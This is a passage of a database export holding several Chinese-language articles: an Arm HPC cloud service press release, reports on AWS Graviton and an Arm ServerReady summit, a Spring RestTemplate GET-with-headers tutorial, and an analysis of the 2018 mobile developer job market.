Arm处理器,是ThunderX系列的第二代最新CPU。与上一代产品相比,制造流程从28nm缩小至16nm,配置改进为最大32内核的2.5GHz规格。另外,搭载有特制Armv8.1内核,在各个内核中的乱序执行((Out-of-Order)线程为最大4线程。支持SIMD矢量长度为128bit的NEON SIMD指令集,而且还搭载有8个内存通道,实现了CPU与内存之间的宽频带接入。\n \nMarvell(R)及ThunderX2(R),是美国Marvell Semiconductor, Inc.在美国及其它国家的注册商标。\n \n**■ HiSilicon 第二代Arm处理器**\n \nHiSilicon 第二代Arm 处理器,是HiSilicon面向Arm高端产品、装配有Cortex-A72微架构(microarchitecture)的最新CPU。支持Armv8-A 64 bit指令集和128 bit的NEON SIMD扩展指令集。不仅搭载了32个内核,而且与上一代产品相比,频率从2.1GHz提升到2.4GHz,实现了高性能化。\n \n另外,其L2・L3缓存较大,达到2MB/core,对于热流体计算及量子化学等需要对缓存进行较多连续访问的应用而言,具有高速化的效果。\n \n此外,在本次发布会上,IDC Frontier株式会社董事长兼社长铃木胜久以及Arm株式会社董事长兼社长内海弦也发表了讲话。\n \n**IDC Frontier株式会社董事长兼社长铃木胜久:**\n \n“对于HPC Systems公司开始提供Science Cloud On Arm HPC服务,我们IDC Frontier公司非常欢迎。将专用于尖端科学计算的HPC环境与高可靠和高安全性的IDC Frontier数据中心设施相结合,是计算科学的最佳解决方案。这一点我们非常确信。今后,我们IDC Frontier公司将与HPC Systems公司一同为解决大学、政府机关、企业在研究开发方面的课题贡献力量。”\n \n**Arm株式会社的董事长兼社长内海弦:**\n \n“对于HPC Systems公司开始提供Science Cloud On Arm HPC服务,我们Arm公司衷心地表示高兴。对于目前正在推进的最新科学计算及AI应用的优化,我们将持续给以技术支援。”\n \n**■ 服务规格**\n \n**【 Marvell(R)ThunderX2(R) 】**\n<CPU>\nISA :Armv8.1 64bit\n内核数 :28\n内核数/节点 :56内核\n基础频率 :2.0GHz\nCPU搭载数量 :2\n<Memory>\n模块规格 :DDR4-2666\n模块容量 :16GB\nDIMM搭载数量 :8\n总容量 :128GB\n<Storage>\nSATA3 480GB SSD x2(Soft RAID1)\n<OS>\nCentOS, Ubuntu, Red Hat Enterprise Linux\n<NIC>\nDual 10 Gigabit Ethernet、Mellanox MT27700 ConnectX-4 Mellanox、MT27800 ConnectX-5\n<硬件的月费金额(不含税)>\n150,000日元/节点\n<可安装的HPC应用程序>\nGROMACS/LAMMPS/GAMESS/OpenFOAM/VMD等(※1)\n<程序构建编译器>\nArm Compiler for HPC/GCC(※2)\n<程序构建的算法运算子程序集合>\nArm Performance Libraries(※2)\n<程序构建的MPI子程序集合>\nOpen MPI(※2)\n<可使用的应用程序的月费金额(不含税)>(※3)\n100,000日元\n \n**【 HiSiliconHi1616 】**\n<CPU>\nISA :Armv8-A 64bit\n内核数 :32\n内核数/节点 :64内核\n基础频率 :2.4GHz\nCPU搭载数量 :2\n<Memory>\n模块规格 :DDR4-2133\n模块容量 :16GB\nDIMM搭载数量 :16\n总容量 :256GB\n<Storage>\nSATA3 300GB HDD x1\n<OS>\nCentOS, Ubuntu, Red Hat Enterprise Linux\n<NIC>\nDual 10 Gigabit Ethernet、Mellanox MT27800 ConnectX-5\n<硬件的月费金额(不含税)>\n150,000日元/节点\n<可安装的HPC应用程序>\nGROMACS/LAMMPS/GAMESS/OpenFOAM/VMD等(※1)\n<程序构建编译器>\nArm Compiler for HPC/GCC(※2)\n<程序构建的算法运算子程序集合>\nArm Performance Libraries(※2)\n<程序构建的MPI子程序集合>\nOpen MPI(※2)\n<可使用的应用程序的月费金额(不含税)>(※3)\n100,000日元\n有关选购品、程序构建、商业应用、Arm Allinea Studio等事宜,请向本公司咨询。\n \n※1 可使用的应用程序清单,请予以咨询。可能会有一部分应用程序需要客户预先进行注册或者取得授权。\n \n※2 关于编译器和子程序集合,需先注册或者取得授权时会发生费用。\n \n※3 是指使用一种应用程序的费用。\n \n**■ 关于HPC Systems株式会社**\n\nHPC Systems株式会社,主要从事用于大学、研究机构、制造业等行业的大型企业的科学技术计算的高性能计算机的开发、制造及销售业务,可根据研究开发的计算方法、计算能力等需求,提出最佳的群集系统及并行文件系统,并提供系统集成服务、高速调谐服务、HPC云服务、计算化学解决方案和研究开发支援服务等。详情请参照http://www.hpc.co.jp/\n\n**<有关发布内容的咨询>**\n\nHPC Systems株式会社 HPC 事业部\n\n电话:03-5446-5531\n\nhttps://prtimes.jp/main/html/rd/p/000000001.000038530.html?from=groupmessage&isappinstalled=0',1,0,NULL,0,0,'2018-11-05 15:29:09','2019-08-05 15:53:33',39,NULL,NULL,'',0,NULL,1,'2018-11-02 15:25:12',0,1,0,NULL,1,1,NULL,NULL,0),(167,NULL,'服务器芯片市场要变天!亚马逊ARM架构芯片牛在哪?','\n近日,公有云计算大战出现重要节点!亚马逊云计算部门(AWS)正式对外发布了基于ARM架构的云服务器芯片Graviton及基于该芯片提供的EC2 A1虚拟服务器,宣称对部分工作负载能耗可降低45%。这意味着亚马逊AWS已经建立了自己的服务器芯片,并且成为第一家公布了基于ARM架构的定制CPU的主流云服务提供商。\n\n\n\nAmazon Elastic Compute Cloud (Amazon EC2) 是一种 Web 服务,可提供在云中大小可调的计算容量。该服务旨在让开发人员能更轻松的进行网络级规模的计算。\n\nEC2 A1也是全球第一批提供ARM架构处理器的云服务,提供了除了英特尔和AMD服务器处理器之外的第三个选择。这个云服务究竟有哪些特别之处?它又透露出Graviton处理器的哪些性能?本文将对这些问题进行详细解读。\n\n\n**亚马逊推出自研服务器芯片**\n\n在西雅图举行的AWS Re:Invent 2018用户大会上,AWS全球基础设施和客户支持副总裁Peter DeSantis在发表主旨演讲时说到,其新的EC2 A1计算服务依赖于Annapurna实验室研发的基于ARM架构的Graviton服务器处理器,此前亚马逊数据中心使用的是AWS已经运行的英特尔至强(Xeon)和AMD霄龙(Epyc)处理器计算服务。\n\nAnnapurna实验室是一家以色列芯片开发商,这家公司在2015年被亚马逊以3.5亿美元收购。\n\n\n\n**▲AWS全球基础设施和客户支持副总裁Peter DeSantis**\n\nDeSantis表示,之所以被称为A1,其意图是横向扩展运行在许多机器上的应用程序,提高许多Web应用程序的质量。具体而言,它们适用于容器化微服务或捆绑的应用程序。因此,它们可以运行在多种计算机和软件上,以及Web服务器、开发环境和缓存服务器组。\n\nGraviton处理器的诞生是ARM处理器优势的象征。ARM处理器通常主要用于智能手机、IoT等低功耗设备以及网络路由器。如今,它们开始进入主流数据中心服务器。\n\n相比英特尔或AMD公司的处理器,该处理器在运行特定工作复杂时,比如Web服务器来说其处理器运行特定工作负载时的成本可能会降低45%,但是AWS的这个数据是如何得来的。\n\n目前EC2 A1可在美国东部、美国东部、美国西部和欧洲(爱尔兰)地区使用,并且可以运行在亚马逊 Linux、红帽企业版Linux和Ubuntu上编写的应用程序。如果Windows Server被移植到AWS Arm服务器芯片,那未来会不会很有趣?\n\n**EC2 A1的进给量和速度**\n\n此前,高通放弃了其Centriq 2400处理器,Applied Micro刚刚在其X-Gene被Ampere(一家由私募股权公司凯雷集团Carlyle Group资助的新公司)收购之前喘口气。\n\n不过AWS没有选择配置近期的Arm架构服务器处理器领导者——Marvell(前身为Cavium公司)的ThunderX2芯片,而是已经打造出自己的服务器芯片,当然这也不意味着亚马逊公有云以后不会用Marvell和Ampere的Arm芯片。\n\nAWS已经在Annapurna实验室内部开发其“Alpine”系列的双核和四核Arm芯片,为它的服务器集群创建SmartNIC。\n\n这些SmartNIC是该服务器集群不可或缺的一部分,除了EC2上的英特尔Xeon、AMD Epyc、和现在的Graviton处理器的操作系统和应用程序之外,几乎可以卸载所有功能,以便这些云服务中的计算核心可用于运行应用程序。\n\n亚马逊和Annapurna实验室自2016年1月首次亮相以来一直没有披露过Alpine系列芯片,当时它推出了32位Armv7和64位Armv8设计,并表示他们拥有支持DDR4内存和裸片上的2MB L2缓存等“企业级性能和功能”。\n\n\n\n▲Alpine芯片用于网络设备(家用路由器和基本以太网交换机)以及存储设备的列表\n\n上图是将Annapurna的Alpine芯片的列表用于网络设备(家用路由器和基本以太网交换机)以及存储设备的列表,包括基于Arm Holdings的Cortex-A15内核的双核和四核32位元器件,其中双核芯片的运行频率为1.4 GHz,四核芯片的运行频率为1.7 GHz,另外基于Cortex-A57设计的四核芯片的运行频率也在1.7 GHz。这些Arm Cortex内核同时运行超标量流水线(superscalar pipelines)和乱序执行,但它们没有超线程。\n\n由于亚马逊暂未透露详情,进给量和速度(feed and speed)都暂时无让人印象深刻的具体信息。不过根据现有信息可以大致得知这些设备对于亚马逊来说有多便宜,以及他们可以通过多少服务器卸载计算来提高AWS的整体服务器、网络和存储效率。\n\n与此同时,Mellanox正在推Bluefield多核ARM处理器,微软正在Azure公有云中的服务器上使用FPGA芯片作为网络加速器和计算引擎,Netronome兜售其Agilio网络适配器。\n\n根据现有信息,Graviton似乎是一个相当实用的处理器,而且和英特尔的“Skylake”Xeon-D-2100 v2类似,后者有8到18个核心,运算频率在1.6 GHz到2.3 GHz之间。\n\nAWS网站上有标明Gravitons基于64位Neoverse内核,这几乎可以确定其“Cosmos”内核是特定的,包括Arm的Cortex-A72或Cortex-A75设计的调整版本。这些设计旨在以16纳米芯片制造工艺实现,可能意味着选用了台湾半导体制造公司作为代工厂。\n\nNeoverse在10月对数据中心Arm处理器进行改造和品牌重塑,使它们每年性能提高30%,并沿着到2021年从7纳米发展到5纳米的路径前进。\n\n根据AWS的公开显示,外界从EC2 A1了解到的Graviton处理器,支持多达16个虚拟CPU(vCPU)和高达32 GB的主内存,其服务器适配器网络带宽高达每秒10 Gb,其Elastic Block Store(EBS)带宽高达每秒3.5 Gb。\n\n目前AWS没有证实它正在使用哪个Cosmos内核,也没有证实Graviton有16个核心并且没有同步多线程来为每个核心提供多个虚拟线程。(SMT支持通常由Arm许可证持有者添加,并且尚未成为Arm的基本内核许可证的一部分。这可能会随着2019年到期的“Ares”内核而改变。)\n\n不过,AWS已向The Next Platform确认这些EC2 A1的Graviton芯片运行频率为2.3 GHz。就raw整数计算而言,Graviton处理器应该可以与Xeon-D抗衡。\n\n以下是不同A1服务的进给量和速度:\n\n\n\nThe Next platform怀疑其芯片的内存不是很多,他们假设没有很多的内存带宽,特别是假设只有一个内存控制器和两个内存通道。Xeon D-2100 v2处理器有两个内存控制器和四个内存通道,最高容量为512 GB,配备非常昂贵的128 GB记忆棒,但即使使用便宜的8 GB便携式记忆棒能可轻松达到32 GB。Annapurna实验室可能在其芯片上放置了大量内存控制器,但The Next platform也认为它不支持同步多线程,因此The Next platform预计其芯片上有16个内核。\n\n一个很好的平衡是每八个内核有一个内存控制器,但如果想让计算容量和内存带宽恢复平衡,甚至可能用四个内存控制器更好。由于AWS没有炫耀这件事,因此The Next platform怀疑它没有这样做。\n\nAWS警告说,这些A1实际上是用于不特别限制内存带宽的横向扩展工作负载,例如Web服务器、开发环境、缓存服务器或容器化的微服务。\n\n除基于Arm的A1外,AWS还在EC2主题上启动了一些其他基础架构变体。新的C5n服务在它们之间运行100 Gb/秒以太网网络,这使它们适用于某些与带宽相关的HPC仿真和建模、机器学习训练和密集数据分析工作负载。\n\n与C5和C5d一样,这些C5n基于具有自定义“Skylake”Xeon SP 8000 Platinum系列处理器的双插槽服务器节点,看起来它们每个芯片有18个内核,运行频率为3 GHz。\n\n\n\n最后,AWS正在为去年10月推出的P3 GPU加速服务带来每秒100 Gb的以太网网络和最高可达到每秒25 Gb的服务器链路。这些具有更快网络连接的P3dn将于下周推出,它们还配备了具有32 GB HBM2内存的“Volta” Tesla V100 GPU加速器,而不是用在原始Voltas以及原始P3中的16 GB内存。这些服务基于一对定制的24核Xeon SP处理器,而且机箱中最多有8个GPU。\n\n\n**结语:或将打击英特尔和AMD?**\n\n此前英特尔在服务器芯片市场的占有率非常高,亚马逊、谷歌、微软等主流云服务提供商的数据中心都在使用英特尔芯片。\n\n此前几乎垄断移动终端芯片市场的高通也曾进军服务器领域并计划推出ARM架构服务器处理器,不过这一项目似乎尚未透露进一步消息。\n\n虽然微软在去年也推出过支持ARM架构处理器的Windows Server操作系统,不过直接将基于ARM处理器的计算租赁产品用在云计算服务的公司,亚马逊是全球第一家,而这一举动或许是云服务提供商将要降低对英特尔至强处理器依赖的重要一步。\n\n文章转发微信公众号“智东西”,原文来自:The Next Platform',1,0,NULL,0,0,'2018-12-26 15:35:12','2018-12-26 15:35:12',26,NULL,NULL,'',0,NULL,1,'2018-11-29 15:29:56',0,0,0,NULL,1,1,NULL,NULL,0),(168,NULL,'2018 Arm ServerReady 北京峰会成功召开','12月13-14日,2018 Arm ServerReady Event北京峰会在北辰洲际酒店成功召开。\n\n**Arm 公布全新品牌Neoverse**\n\n\n\n当万亿级智能设备互联的世界到来时,以数据中心为中心的架构将难以为继,边缘计算将会发挥越来越重要的作用。\n\n针对这样的应用场景,Arm宣布了支持从数据中心到边缘计算的全新架构Neoverse的线路图,即2019推出7纳米的Ares,2020年推出7纳米的Zeus,2021年推出5纳米的Poseidon,而且每代产品性能提升30%。\n\n\n\n**Arm在工业服务器领域最新进展**\n\n日前,亚马逊公布了基于Arm架构的Amazon EC2 A1,承诺对部分工作负载能耗降低45%。\n\n\n\nSmugMug则分享了使用亚马逊Arm架构的应用情况。\n\n\n\n微软介绍了基于Cavium ThunderX2 Arm64进行开发平台测试的应用。\n\n\n\n**绿色计算产业联盟会员介绍最新进展**\n\n**绿色计算产业联盟会员Ampere**\n\n9月18日,第一代Ampere产品已经正式发布,与主流原始制造商展开了深度的合作,完善的软件生态体系已经初步构成。\n\n\n\n基于Ampere eMAG 8180 Arm 64 处理器的联想服务器吸引了与会者的热议。\n\n\n\n**绿色计算产业联盟会员华为**\n\n华为基于ARM Cortex-A系列的第一代嵌入式多核处理器芯片于2009年上市,用于无线产品。今年,基于华为自研泰山核的,业界首款7纳米工艺数据中心处理器Hi1620已经上市。\n\n\n\n**绿色计算产业联盟会员华芯通**\n\n华芯通第一代Arm服务器芯片昇龙4800已于今年11月量产并接受订单。\n\n\n\n**绿色计算产业联盟会员UIT**\n\nUIT是中国Arm架构服务器的践行者,2017年,UIT与Arm、华芯通、龙岗区签署合作协议,共建“Arm 架构数据中心联合实验室”。2018年10月,UIT DCServer H2000 Arm 服务器成为首批通过Arm ServerReady认证的服务器。\n\n\n\nFemrice-北京东大金智在峰会期间展示了通过Arm ServerReady认证,基于全国首款10nm Arm架构服务器处理器华芯通-1(昇龙)的Arm 服务器。\n\n\n\n\n',1,0,NULL,0,0,'2018-12-26 15:45:47','2020-08-17 18:03:51',52,NULL,NULL,'',0,NULL,1,'2018-12-14 15:36:03',0,0,0,'2020-08-17 18:03:51',1,1,NULL,2,0),(176,NULL,'RestTemplate如何发送带headers的GET请求','\n##发送自定义header的POST请求\n\n之前写过一个类似的请求,但是是POST的。这个也摸了一段时间,自己看参数整了出来。代码如下:\n```java\n// header填充\nLinkedMultiValueMap<String, String> headers = new LinkedMultiValueMap<>();\nheaders.put(\"Content-Type\", Collections.singletonList(\"application/json;charset=UTF-8\"));\nheaders.put(\"signature\", Collections.singletonList(makeSignature(form.getNewMobile())));\n// body填充\nJSONObject json = new JSONObject();\njson.put(\"oldMobile\", mobile);\njson.put(\"newMobile\", form.getNewMobile());\nHttpEntity<String> request = new HttpEntity<String>(json.toString(), headers);\n// 一个单例的restTemplate\nRestTemplate restTemplate = HttpInvoker.getRestTemplate();\n// 发送请求\nResponseEntity<String> response = restTemplate.postForEntity(whiteListURL, request, String.class);\n\n```\n\n很简单的想着,只需要把上面的postForEntity()改成get的就行,但不是这样的。\n\n\n\n##发送自定义header的GET请求\n\n粗略看了看postForEntity()和getForEntity()这两个方法的实现,都是准备参数,然后调用execute()方法,如下:\n\n```java\n// POST\n@Override\npublic <T> ResponseEntity<T> postForEntity(String url, @Nullable Object request,\n Class<T> responseType, Object... uriVariables) throws RestClientException {\n\n RequestCallback requestCallback = httpEntityCallback(request, responseType);\n ResponseExtractor<ResponseEntity<T>> responseExtractor = responseEntityExtractor(responseType);\n return nonNull(execute(url, HttpMethod.POST, requestCallback, responseExtractor, uriVariables));\n}\n// GET\n@Override\n@Nullable\npublic <T> T getForObject(String url, Class<T> responseType, Map<String, ?> uriVariables) throws RestClientException {\n RequestCallback requestCallback = acceptHeaderRequestCallback(responseType);\n HttpMessageConverterExtractor<T> responseExtractor =\n new HttpMessageConverterExtractor<>(responseType, getMessageConverters(), logger);\n return execute(url, HttpMethod.GET, requestCallback, responseExtractor, uriVariables);\n}\n\n```\n\n区别就在于RequestCallback实例化的时候,传的参数不一样。POST的时候,是将header做为参数传给了RequestCallback。再然后就是execute()中的GET和POST参数不一样。到这个时候,发送自定义header的GET请求,已经很明显了。实例化的函数,都是public的。如果不是public的,或者说我们不能直接访问到,还可以考虑通过反射的方式去调用相关的方法,但这里不需要用反射了。\n\n##结果\n\n```java\n// header填充\nLinkedMultiValueMap<String, String> headers = new LinkedMultiValueMap<>();\nheaders.put(\"Content-Type\", Collections.singletonList(\"application/json;charset=UTF-8\"));\nheaders.put(\"signature\", Collections.singletonList(makeSignature(mobile)));\n// 获取单例RestTemplate\nRestTemplate restTemplate = HttpInvoker.getRestTemplate();\nHttpEntity request = new HttpEntity(headers);\n// 构造execute()执行所需要的参数。\nRequestCallback requestCallback = restTemplate.httpEntityCallback(request, JSONObject.class);\nResponseExtractor<ResponseEntity<JSONObject>> responseExtractor = restTemplate.responseEntityExtractor(JSONObject.class);\n// 执行execute(),发送请求\nResponseEntity<JSONObject> response = restTemplate.execute(apiAddress + \"/xxx/whitelist/check?phone=\" + mobile, HttpMethod.GET, requestCallback, responseExtractor);\n\n```\n虽然很简单,但是看似不可能,自己却做到了、完成了,就很有成就感。\n\n--------------------- \n作者:一条肥鱼 \n来源:CSDN \n原文:https://blog.csdn.net/asahinokawa/article/details/86497531 \n版权声明:本文为博主原创文章,转载请附上博文链接!',19,0,NULL,0,0,'2019-01-21 14:19:10','2020-08-17 16:26:52',16,NULL,NULL,'',0,NULL,1,'2019-01-21 14:19:10',0,0,0,NULL,1,1,NULL,8,0),(177,NULL,'2018年移动端:上半场有多辉煌,下半场就有多迷茫-IT独行侠','对于移动互联网而言,2018年像是球场上的一声裁判哨。哨声响起,高潮迭起的上半场结束。本该再创辉煌的下半场,还没开赛却被告之:规则改变、场地收缩、教练下课、冷板凳无限加长。\n\n这样前途未卜的下半场,你还敢上吗?\n\n作为队伍「前锋」的移动端程序员,面对这样的挑战,又有哪些不一样的表现和前景?100offer将结合平台招聘数据和候选人采访,展现移动端程序员「冰火两重天」的2018年。\n\n注:100offer致力于为2年以上经验的中高端互联人,提供北上广深杭、新加坡等地的工作机会。本文数据除另行说明外,均取自2018年1月1日至12月31日,经筛选在100offer进行匿名展示的1464位移动端方向求职者。他们收到的面试邀请和薪资,普遍高于市场平均水平。\n\n2018:移动端上半场宣告结束\n\n纵观100offer近几年的平台数据,虽然移动端市场供需从2016年开始呈下降趋势,但是人均面邀数一直小幅增长。然而,2018年这一趋势被彻底打破。\n\n\n\n相比于2017年,2018年Android程序员人均面邀数减少40%,iOS程序员降幅更高达57%,即平均每个移动端程序员在找工作时收到的面邀数比去年减少一半。 \n\n\n\n2018年移动端程序员在求职人数上较2017年小幅上涨,面邀总数却大幅缩水,IT独行侠新闻社,进一步加大的供需之间的矛盾。虽然从现有的比例上还没有到「供大于求」的局面,但是考虑到100offer的求职者均为2年以上经验的中高程序员,可以看出移动端市场在2018年走入拐点,从前「遍地开花」的移动端在2018年「跌入尘埃」。移动端「不愁工作不愁钱」的上半场宣告结束。\n\n移动端市场的衰落其实早已有迹可循。根据Trustdata《2018年Q3中国移动互联网行业发展分析报告》显示,2018年前三个季度中国手机月度出货量同比大幅下滑,智能手机的渗透率接近饱和,移动互联网用户从增量市场转向存量市场,暗示着移动互联网的红利期结束。\n\n伴随着移动端用户增速的放缓,现有市场则被国内几大互联网巨头牢牢把控。移动端市场经过几年的大浪淘沙,沉淀下来的APP产品逐渐稳定,对于移动端人才需求的增速也日趋下降。虽然不乏有今日头条、拼多多、趣头条等互联网公司的加速拓张,但是更多的公司在2018年都处在一个相对平稳甚至「瘦身」的阶段。现有的移动端程序员就成了泡在海绵里的水,太阳一晒,「蒸发淘汰」成了不可避免的命运。\n\n移动端程序员:上半年的宠儿,下半年的弃儿\n\n「我知道这天迟早要来,但是没想到它来得这么快。」郭昌这样评价移动端遇冷的现状。\n\n作为有4年工作经验的移动端程序员,郭昌一直有强烈的危机感。2014年他刚入行的时候,移动端的就业市场简直可以用「火爆」两个字来形容。\n\n「所有的公司都在抢人,用钱砸人。一个稍微懂点安卓开发的实习生一个月都能拿七八千,更别说懂C++或JAVA的科班生了。」\n\n郭昌是「半路出家」,土木工程专业毕业的他,在建筑行业「日落西山」的当口,毫不犹豫地选择「弃暗投明」,投身热火朝天的移动互联网行业。\n\n「移动端程序员入行其实并不难,跟在老程序员后面看三个月,基本上就摸清门道了。而且2014、2015年做移动端追的是速度和用户量。某一类APP火了,你得立马跟上,根本没有太多的精力去做更深入的开发。」\n\n只用了短短两年时间,郭昌的年薪就破了25万。但是到了2016年下半年,郭昌明显感觉移动端程序员的需求量大不如前。「公司挑人开始越来越严,很多大公司要求硕士学历,培训班出来的非科班生越来越不受待见。」\n\n2018年下半年,郭昌的焦虑终于变成了事实,他被公司裁员了。\n\n「公司APP下架的第二天,整个技术部门就解散了。虽然拿了2个月工资的赔偿金,但我一点也开心不起来,因为我知道移动端的好日子是真的到头了。」\n\n根据100offer平台对2018年移动端程序员的季度统计数据,Q1移动端程序员的平均面邀数为3.1个,相较2017年4.4个的人均面邀数,呈直线下降趋势。本应迎来全年求职高峰的Q2也遭遇「滑铁卢」,不管是人均面邀数还是平均面邀薪资都大幅下降。接下来的Q3、Q4更是将这种颓势进一步加大。等到了Q4,移动端程序员的人均面邀数仅为1.7个,比Q1减少了近一半。而人均面邀薪资也从Q1的514K直线降到了Q4的413K,降幅近20%。\n\n「移动端程序员早就饱和了,市场根本消化不了这么多人。之前市场好的时候,公司多招几个人好干活。2018年下半年移动端一遇冷,不仅小公司要降薪裁人,大公司也基本上把HC(职员人数总额)都冻结了。」移动端专家杨辉在接受100offer采访时,这样说道。\n\n资本市场遇冷和人才供需比例失衡是造成2018年下半年移动端程序员「失宠」的主要原因。\n\n资本寒潮中,创投和私募机构的投资变得尤为谨慎,一些已融资多轮的互联网明星企业争相选择在今年上市「回血」,比如小米、爱奇艺、英语流利说、拼多多、趣头条等。而另一些公司则通过裁员瘦身「过冬」:BAT等大厂招聘岗位冻结,京东、知乎、美团传出不同程度的「优化」消息。\n\n与大环境对应的是移动端市场的人才供需比失衡。根据e成科技发布的《中国互联网行业中高端人才招聘报告》统计,2018年9月移动开发工程师的供需比为1.13:1,高于软件开发、运维工程师、web前端开发等其他技术岗位。(供需比:岗位从业人数/岗位数,供需比>1,表示该岗位从业人数多于岗位数)\n\n用郭昌的话来说,就是「上半年两个岗位抢一个移动端程序员,下半年两个程序员抢一个岗位」。2018,移动端程序员从上半年的「宠儿」走向下半年的「弃儿」。\n\n下半场淘汰加剧,留下的都是「悍将」\n\n上文中提到的移动端专家杨辉,是国内某一线互联网大厂移动端招聘的主面试官。他这样解释目前移动端市场的招聘门槛:「根据我的了解,现在国内一线大厂基本上很少招初中级的移动端程序员了。最起码要有4年以上的工作经验,要对底层技术比较了解,还需要求职者有优化能力和框架设计能力。」\n\n对于4年以下的求职者,除非有互联网大厂经验,学习能力强,有着完整的项目经验,否则很难进入互联网大厂的面试环节。\n\n求职者晓东通过自己的面试经历,侧面证实了杨辉的言论绝非「危言耸听」。晓东有两年半的Android开发经验,11月想要看新的工作机会。照以往的经验,换一份工作对于他并不是难事。但是面试了五家公司,只有一家天使轮的创业公司给他发了offer,其他四家无一例外都拒绝了他。与面试公司的HR沟通之后,他才知道自己败在「不够老练」上。 \n\n「其实也不难理解,现在互联网大环境不好,公司想招的是能帮公司打硬仗的人,而不是还要别人带教的小白。」晓东在总结失败经验时,认为自己除了工作年限的「硬件」不够,对于底层核心技术和基本原理的缺失,也是一大硬伤。\n\n「以前公司招移动端程序员,主要看你做过哪些项目,会不会画UI,能不能写界面和业务逻辑。但是现在面试除了问你项目经验,还会问底层和原理的问题,甚至会延伸到公司的业务和数据。如果平时只顾埋头敲代码,肯定一问三不知。」\n\n在100offer平台2018年的移动端程序员招聘JD中,大多数企业除了对求职者的语言和编码等基础能力提出要求外,越来越强调对于Framework层的理解和UI框架的掌控能力。而完整的项目经历和多端知识也成了重要的加分项。\n\n晓东打算在公司再沉淀一两年,等自己的能力达到「老练」的标准,再去寻找新的工作机会。 \n\n\n\n通过对100offer平台2017和2018年不同工作年限移动端程序员的人均面邀数和面邀均薪进行比较,2018面邀数下降幅度大的,是工作4-6年的程序员。而在全年整体面邀数下滑的情况下,工作7-9年和10年以上的程序员,收到的人均面邀数却实现了小幅增长。在面邀薪资方面,工作7-9年和10年以上的求职者的面邀薪资也一路「高歌猛进」。\n\n「大龄」一直被视为程序员职场「催命符」。但在2018年的经济寒冬,大龄移动端程序员却似乎迎来了久未谋面的「春天」。\n\n100offer在之前的文章中,多次探讨过程序员的「中年职场危机」问题。在各类社交媒体上,关于程序员「35岁失业危机」的讨论也从未断绝。\n\n「很多人认为程序员这一行吃的是青春饭,35岁职业生涯就到头了。虽说程序员需要拼体力,但是35岁还在拼体力的程序员,绝不会是一个的程序员,被淘汰也是理所当然的。」从Android工程师成长为架构师的廷轩说。 \n\n\n\n对比企业关于初级移动端程序员和移动端程序员的招聘要求,很明显可以看出,初级移动端程序员的招聘要求主要是熟练的语言基础,而移动端程序员则需要对设计模式、深层管理机制、底层原理有足够的理解,能从全局上对产品的设计和开发进行把控。\n\n俗话说,姜越老越辣。对于移动端程序员而言,「辣」的不只是资历,更是「全局观」与「掌控力」。\n\n2019:逆风而上,方是勇士之举\n\n2018年对于移动端人而言,是「兵荒马乱」的一年。中兴、华为先后遭欧美打压,苹果手机遭起诉,在中国的销售前景不明,中国移动端市场进入「淘汰期」。2019年的移动端市场发展,是一个让人「忐忑不安」的未知数。\n\n与此同时,移动端的技术迭代从未停住脚步。谷歌推出Flutter框架和Dart语言,Facebook大规模重构ReactNative,华为确认正自主研发手机操作系统替代Android。2019年的移动端技术发展,注定是「只见新人笑,不闻旧人哭」的新里程。\n\n作为2018年移动端跳槽「薪资王」的杨辉,凭借自己稳扎稳打的7年移动端经验,成功以65万年薪跳槽至现在的公司。在谈及移动端技术的「变革」时,他非常坚定地认为:现有的移动端技术短期内依然「不可替代」,但是未来会和更多的新领域进行融合与合作。\n\n「包括智能汽车、智能电视、AI、VR产品都和安卓系统有关联,都是在安卓系统上做出的创新。移动端音视频也能和AI、推荐算法融合。」\n\n饿了么架构师MM也表达了同样的观点。「移动端的需求一直都在。但是未来需要移动端程序员往底层和原理研究。对于程序员,到了一定阶段,不应该被语言和平台限制。」\n\n同时,他们都提出,即使有天现有的移动端技术真的被取代,对于真正「功力深厚」的移动端程序员也造不成任何威胁。因为技术是相通的,之前的开发经历完全可以复用和迁移。\n\n但是对于那些「什么基础都没有,只会画UI,写界面,写业务逻辑」的移动端程序员而言,技术和语言的转变则会是「灭顶之灾」。\n\n在谈到当下移动端程序员普遍存在的问题时,MM提到了以下几点:\n\n(1)只重视过程,不重视结果。有些移动端程序员虽然加班很多,但是产出的质量和工作时间不成正比。\n\n(2)不关怀数据。做了技术方案却不测试数据。但其实测试数据很重要,关乎很多核心的要点。\n\n(3)不沟通,不交流。部分移动端程序员喜欢闷头做事,对自身的成长非常不利。只有经常参与别人的讨论才能发现自己的短板,更大程度地获得进步。\n\n(4)没有主人翁精神。一些移动端程序员不能把事情做到有始有终,没有负责的态度。\n\n(5)不学习。移动端是一个新技术更迭换代很快的行业,如果不学习,很容易被淘汰。\n\n想要在市场和技术双重冲击的2019年「逆风而上」,移动端程序员需要注意以下几点:\n\n(1)跨平台一站式开发将是未来趋势,要注重积累相关技术经验\n\n从Facebook推出的RN(ReactNative)到近期Google推出的flutter,包括很多小程序快应用,都是移动端跨平台技术应用的尝试。虽然很多跨平台方案都有优缺点,至今没有完善的替代方案,但这是未来移动端开发不可逆转的大方向。\n\n对于这些跨平台技术,即使在日常工作中不常使用,也需要不断学习跟进,为即将到来的改革做好充足的准备。\n\n(2)对于行业的选择要更加谨慎,切勿「金钱至上」\n\n做程序员,一方面练技术,另一方面选行业也特别重要。因为持续的行业经验对职业发展有很大益处,也能规避过高的波动和风险。2018年P2P的暴雷就给移动端程序员和全体互联网人敲响了警钟。\n\n不过,具体的行业选择是一个仁者见仁智者见智的问题,MM的个人经验是:「选择一个真正能对人的生活产生价值的行业,比如出行、生活服务等等。移动端程序员要有行业风险判断意识,要重「技术」和「产品」,不能一味地看重高薪,要知道高收益也往往意味着高风险。」\n\n(3)做好职业规划,为自己建立良好口碑\n\n切记做好职业生涯规划和时间管理,要有充分的时间去和别人做交流,了解「业界大佬」的做事内容和方式。人脉对于程序员很重要,不要拘泥于自己的小圈子,要去结识更多有能力的人,寻找更多的前进动力。另外,求职者如果拥有良好的人脉和业界口碑,在开源社区和别人有过合作,或者自身拥有开源代码,得到大家的认可,很容易不经过面试就得到新的工作机会。\n\n(4)寒冬之下,更好地学习提升才是王道 